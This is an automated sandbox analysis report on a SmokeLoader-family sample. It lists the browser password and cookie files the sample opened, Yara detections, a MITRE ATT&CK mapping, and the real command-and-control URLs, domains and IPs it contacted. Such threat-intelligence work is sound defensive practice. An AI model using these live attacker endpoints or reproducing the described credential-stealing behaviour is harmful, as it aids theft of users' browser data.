Code function: 19_2_00C5E0CA GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

19_2_00C5E0CA

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C30652 GetUserNameW,

19_2_00C30652

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: 19_2_00C2409A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

19_2_00C2409A

Source: C:\Users\user\AppData\Local\Temp\9CFE.exe

Code function: 7_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

7_2_00406805

Source: Later.pif, 00000013.00000003.3986742882.000000000167C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: V%ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Later.pif, 00000013.00000003.3986742882.000000000167C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

WMI Queries: IWbemServices::ExecQuery - root\securitycenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif

Code function: \Google\Chrome\User Data\Default\Login Data

19_2_01401250

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.5:49743 -> 46.246.96.149:80

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78801\Later.pif	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Source: Later.pif	Binary or memory string: WIN_81
Source: Later.pif	Binary or memory string: WIN_XP
Source: Later.pif	Binary or memory string: WIN_XPe
Source: Later.pif.8.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
Source: Later.pif	Binary or memory string: WIN_VISTA
Source: Later.pif	Binary or memory string: WIN_7
Source: Later.pif	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2183305137.0000000003C21000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2182890350.0000000002230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2417255562.0000000003FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2417195309.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	131 Windows Management Instrumentation	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	2 Valid Accounts	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	2 Valid Accounts	3 Obfuscated Files or Information	1 Credentials In Files	2 File and Directory Discovery	SMB/Windows Admin Shares	21 Input Capture	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	21 Access Token Manipulation	12 Software Packing	NTDS	147 System Information Discovery	Distributed Component Object Model	3 Clipboard Data	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	412 Process Injection	1 DLL Side-Loading	LSA Secrets	681 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 File Deletion	Cached Domain Credentials	251 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	111 Masquerading	DCSync	14 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	251 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	412 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Hidden Files and Directories	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	34%	ReversingLabs
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Roaming\wjshsfa	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\78801\Later.pif	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\9CFE.exe	11%	ReversingLabs
C:\Users\user\AppData\Roaming\wjshsfa	34%	ReversingLabs

Source	Detection	Scanner	Label
https://powerpoint.office.comcember	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
http://nsis.sf.net/NSIS_ErrorError	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
http://46.246.96.149/e_usertestGoogle	0%	Avira URL Cloud	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	0%	URL Reputation	safe
http://gebeus.ru/tmp/index.php	100%	Avira URL Cloud	malware
https://api.msn.com/	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://word.office.comon	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
http://46.246.96.149/sendfiles	0%	Avira URL Cloud	safe
http://46.246.96.149/getcommands	0%	Avira URL Cloud	safe
http://www.autoitscript.com/autoit3/J	0%	Avira URL Cloud	safe
http://46.246.96.149/getpu	0%	Avira URL Cloud	safe
http://46.246.96.149/browsers	0%	Avira URL Cloud	safe
http://46.246.96.149/defenders	0%	Avira URL Cloud	safe
http://46.246.96.149/connect	0%	Avira URL Cloud	safe
http://46.246.96.149/sendcookies	0%	Avira URL Cloud	safe
https://mussangroup.com/wp-content/images/pic1.jpg	100%	Avira URL Cloud	malware
http://www.autoitscript.com/autoit3/0	0%	Avira URL Cloud	safe
http://46.246.96.149/proccesses	0%	Avira URL Cloud	safe
http://cx5519.com/tmp/index.php	100%	Avira URL Cloud	malware
http://46.246.96.149/osinfo	0%	Avira URL Cloud	safe
http://46.246.96.149/	0%	Avira URL Cloud	safe
http://46.246.96.149/x	0%	Avira URL Cloud	safe
http://office-techs.biz/tmp/index.php	100%	Avira URL Cloud	malware
http://crl.v	0%	Avira URL Cloud	safe
http://evilos.cc/tmp/index.php	100%	Avira URL Cloud	malware
http://46.246.96.149/softwares	0%	Avira URL Cloud	safe
https://wns.windows.com/)s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
evilos.cc	127.0.0.127	true	true	unknown
gebeus.ru	58.151.148.90	true	true	unknown
mussangroup.com	185.149.100.242	true	true	unknown
FibtGXfABKPepIBYktzWGsNQQZ.FibtGXfABKPepIBYktzWGsNQQZ	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://46.246.96.149/sendfiles	true	Avira URL Cloud: safe	unknown
http://gebeus.ru/tmp/index.php	true	Avira URL Cloud: malware	unknown
http://46.246.96.149/getcommands	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/getpu	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/browsers	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/defenders	true	Avira URL Cloud: safe	unknown
https://mussangroup.com/wp-content/images/pic1.jpg	true	Avira URL Cloud: malware	unknown
http://46.246.96.149/connect	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/sendcookies	true	Avira URL Cloud: safe	unknown
http://cx5519.com/tmp/index.php	true	Avira URL Cloud: malware	unknown
http://46.246.96.149/osinfo	true	Avira URL Cloud: safe	unknown
http://46.246.96.149/proccesses	true	Avira URL Cloud: safe	unknown
http://office-techs.biz/tmp/index.php	true	Avira URL Cloud: malware	unknown
http://46.246.96.149/softwares	true	Avira URL Cloud: safe	unknown
http://evilos.cc/tmp/index.php	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://word.office.comon	explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000002.00000000.2171644821.000000000C861000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2171644821.000000000C81C000.00000004.00000001.00020000.00000000.sdmp, 9CFE.exe, 00000007.00000003.2819759144.0000000002843000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000011.00000000.2887878869.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif, 00000013.00000000.3863074525.0000000000CB8000.00000002.00000001.01000000.00000007.sdmp, Later.pif.8.dr, Services.7.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/chrome_newtab	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	Avira URL Cloud: safe	unknown
http://46.246.96.149/e_usertestGoogle	Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://powerpoint.office.comcember	explorer.exe, 00000002.00000000.2169172089.000000000C460000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	URL Reputation: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	9CFE.exe, 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe, 00000007.00000000.2816744193.0000000000408000.00000002.00000001.01000000.00000006.sdmp, 9CFE.exe.2.dr	false	URL Reputation: safe	unknown
https://excel.office.com	explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.micro	explorer.exe, 00000002.00000000.2165022415.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2165059057.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2164441432.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000002.00000000.2165593335.0000000009BB1000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	URL Reputation: safe	unknown
http://www.autoitscript.com/autoit3/0	9CFE.exe, 00000007.00000003.2847661594.000000000284F000.00000004.00000020.00020000.00000000.sdmp, Tracked.7.dr, Later.pif.8.dr	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000002.00000000.2163432174.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000002.00000000.2169172089.000000000C549000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com/	explorer.exe, 00000002.00000000.2165593335.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://46.246.96.149/x	Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://46.246.96.149/	Later.pif, Later.pif, 00000013.00000002.4560271483.0000000001668000.00000004.00000020.00020000.00000000.sdmp, Later.pif, 00000013.00000002.4560076317.0000000001400000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000002.00000000.2159497737.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Later.pif, 00000013.00000003.4119080339.0000000003974000.00000004.00000020.00020000.00000000.sdmp, tmp1721021441_0.19.dr	false	URL Reputation: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2165593335.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
77.221.157.163	unknown	Russian Federation	30968	INFOBOX-ASInfoboxruAutonomousSystemRU	true
186.101.193.110	unknown	Ecuador	27947	TelconetSAEC	true
58.151.148.90	gebeus.ru	Korea Republic of	17858	POWERVIS-AS-KRLGPOWERCOMMKR	true
46.246.96.149	unknown	Sweden	42708	PORTLANEwwwportlanecomSE	true
185.149.100.242	mussangroup.com	Turkey	209853	VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi	true

Private

IP
127.0.0.127

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1473147
Start date and time:	2024-07-15 06:09:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@27/58@10/6
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 89 Number of non-executed functions: 211
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
00:10:23	API Interceptor	181660x Sleep call for process: explorer.exe modified
00:11:19	API Interceptor	1x Sleep call for process: 9CFE.exe modified
00:11:23	API Interceptor	1554x Sleep call for process: Later.pif modified
06:10:28	Task Scheduler	Run new task: Firefox Default Browser Agent 79ECFB1D26DF0811 path: C:\Users\user\AppData\Roaming\wjshsfa

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
77.221.157.163	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	fvI01ZBE1b.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	II0MvEwlPf.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	f82a12fabe1bd6370497ec34c93c8d7045cf35ce4ad4e9586f1a532018b0e7fd_dump.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
	QI7nhei84z.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163/systemd.exe
186.101.193.110	S5cXNeuCGu.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
186.101.193.110	a6lzHWp4pa.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	bipto.org/tmp/index.php
58.151.148.90	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	2gQsoHaGEm.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	QJqJic3hex.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php
	mJVVW85CnW.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, Vidar	Browse	cajgtus.com/files/1/build3.exe
	a6GOcbfMde.exe	Get hash	malicious	SmokeLoader	Browse	nidoe.org/tmp/index.php
	oowDCOLXv5.exe	Get hash	malicious	LummaC, Babuk, Djvu, RedLine, SmokeLoader, Stealc, Vidar	Browse	brusuax.com/dl/build2.exe
	0ns5NDsgwK.exe	Get hash	malicious	Amadey, SmokeLoader	Browse	sjyey.com/tmp/index.php
	apeoxsTscm.exe	Get hash	malicious	Clipboard Hijacker, SmokeLoader	Browse	sjyey.com/tmp/index.php
	file.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc, Vidar, Xmrig	Browse	brusuax.com/dl/build2.exe
	file.exe	Get hash	malicious	Glupteba, SmokeLoader, Socks5Systemz, Stealc, Vidar	Browse	trmpc.com/check/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
mussangroup.com	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	fvI01ZBE1b.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	II0MvEwlPf.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	hH5mo7aGIf.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	185.149.100.242
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	185.149.100.242
gebeus.ru	file.exe	Get hash	malicious	SmokeLoader	Browse	187.211.38.89
	file.exe	Get hash	malicious	SmokeLoader	Browse	210.182.29.70
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	92.36.226.66
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.156.239.49
	file.exe	Get hash	malicious	SmokeLoader	Browse	189.171.116.36
	fvI01ZBE1b.exe	Get hash	malicious	SmokeLoader	Browse	220.125.3.190
	II0MvEwlPf.exe	Get hash	malicious	SmokeLoader	Browse	148.230.249.9
	file.exe	Get hash	malicious	SmokeLoader	Browse	187.170.159.176
	f82a12fabe1bd6370497ec34c93c8d7045cf35ce4ad4e9586f1a532018b0e7fd_dump.exe	Get hash	malicious	SmokeLoader	Browse	152.231.127.132
	QI7nhei84z.exe	Get hash	malicious	SmokeLoader	Browse	123.212.43.225

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERVIS-AS-KRLGPOWERCOMMKR	botx.mips.elf	Get hash	malicious	Mirai	Browse	116.41.250.223
	jew.mips.elf	Get hash	malicious	Mirai	Browse	49.169.86.177
	jew.mpsl.elf	Get hash	malicious	Mirai	Browse	115.141.77.174
	jew.ppc.elf	Get hash	malicious	Mirai	Browse	180.227.173.237
	sora.arm7.elf	Get hash	malicious	Mirai	Browse	125.176.30.111
	vNUaW4UiYI.elf	Get hash	malicious	Mirai	Browse	182.230.7.110
	ahN4x3ahps.elf	Get hash	malicious	Mirai	Browse	14.4.158.198
	Jdxh215HCJ.elf	Get hash	malicious	Mirai, Moobot	Browse	112.156.109.150
	O5XVFL6XD2.elf	Get hash	malicious	Mirai	Browse	180.224.40.45
	bolonetwork.x86.elf	Get hash	malicious	Mirai, Okiru	Browse	182.219.54.80
TelconetSAEC	S5cXNeuCGu.exe	Get hash	malicious	SmokeLoader	Browse	186.101.193.110
	bolonetwork.mpsl.elf	Get hash	malicious	Mirai, Gafgyt, Okiru	Browse	157.100.203.152
	arm7-20240709-0417.elf	Get hash	malicious	Mirai	Browse	181.39.203.228
	5GOuTtZoQn.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	186.101.193.110
	EiPVv5yELP.exe	Get hash	malicious	LummaC, Poverty Stealer, SmokeLoader	Browse	186.101.193.110
	Ul8gIL4P3u.elf	Get hash	malicious	Mirai, Moobot	Browse	186.3.191.144
	MMNSxD2fJ3.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	186.101.193.110
	QsyCac05Yl.elf	Get hash	malicious	Mirai, Moobot	Browse	181.39.145.17
	file.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, Monster Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse	186.4.194.68
	b59e52b83b0a0cde0085b3ba306316a86a845a974cbeaf45da905476b6db53bb_dump.exe	Get hash	malicious	SmokeLoader	Browse	186.4.194.68
PORTLANEwwwportlanecomSE	file.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	file.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	file.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	file.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	2ta71O8iWY.elf	Get hash	malicious	Mirai	Browse	82.214.57.153
	FcMd5XxxZ0.elf	Get hash	malicious	Mirai	Browse	5.249.175.220
	fvI01ZBE1b.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	II0MvEwlPf.exe	Get hash	malicious	SmokeLoader	Browse	46.246.96.149
	yz6eX2aHlT.exe	Get hash	malicious	XWorm	Browse	46.246.4.4
INFOBOX-ASInfoboxruAutonomousSystemRU	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	Pi6fnXmVmd.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	27e2394f7b506257a8afa48049a8fe2fef59dc87957def06bd51d1d9dc191732_payload.exe	Get hash	malicious	XenoRAT	Browse	77.221.152.198
	27e2394f7b506257a8afa48049a8fe2fef59dc87957def06bd51d1d9dc191732_payload.exe	Get hash	malicious	XenoRAT	Browse	77.221.152.198
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	fvI01ZBE1b.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	II0MvEwlPf.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163
	file.exe	Get hash	malicious	SmokeLoader	Browse	77.221.157.163

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	winst.exe	Get hash	malicious	Unknown	Browse	185.149.100.242
	winst.exe	Get hash	malicious	Unknown	Browse	185.149.100.242
	file.exe	Get hash	malicious	SmokeLoader	Browse	185.149.100.242
	Loader.exe	Get hash	malicious	LummaC, Xmrig	Browse	185.149.100.242
